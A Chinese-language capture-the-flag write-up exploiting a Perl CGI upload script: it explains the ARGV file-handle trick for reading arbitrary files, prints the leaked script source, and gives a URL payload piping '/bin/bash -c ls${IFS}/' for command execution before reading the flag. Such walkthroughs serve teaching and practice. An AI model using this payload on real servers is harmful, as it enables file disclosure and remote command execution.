点击Files,这里会把上传的文件的内容在下方输出,猜测后台逻辑:
use strict;
use warnings;
use CGI;
my $cgi= CGI->new;
if ( $cgi->upload( 'file' ) ) {
my $file= $cgi->param( 'file' );
while ( <$file> ) { print "$_"; }
}
param()函数会返回一个列表的文件但是只有第一个文件会被放入到下面的file变量中。如果我们传入一个ARGV的文件,那么Perl会将传入的参数作为文件名读出来。对正常的上传文件进行修改,可以达到读取任意文件的目的:
这里根据网址猜测file.pl位于/var/www/cgi-bin/目录下,返回结果如下:
#!/usr/bin/perl
<br />
<br />use strict;
<br />use warnings;
<br />use CGI;
<br />
<br />my $cgi = CGI->new;
<br />
<br />print $cgi->header;
<br />
<br />print << "EndOfHTML";
<br /><!DOCTYPE html
<br /> PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
<br /> "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
<br />>
<br /><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<br /> <head>
<br /> <title>Perl File Upload</title>
<br /> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<br /> </head>
<br /> <body>
<br /> <h1>Perl File Upload</h1>
<br /> <form method="post" enctype="multipart/form-data">
<br /> File: <input type="file" name="file" />
<br /> <input type="submit" name="Submit!" value="Submit!" />
<br /> </form>
<br /> <hr />
<br />EndOfHTML
<br />
<br />if ($cgi->upload('file')) {
<br /> my $file = $cgi->param('file');
<br /> while (<$file>) {
<br /> print "$_";
<br /> print "<br />";
<br /> }
<br />}
<br />
<br />print '</body></html>';
<br /></body></html>
基本上和推测的一致.接着我们利用bash来读取:
/cgi-bin/file.pl?/bin/bash%20-c%20ls${IFS}/|
返回结果如下:
接下来按照上述方法读取flag即可.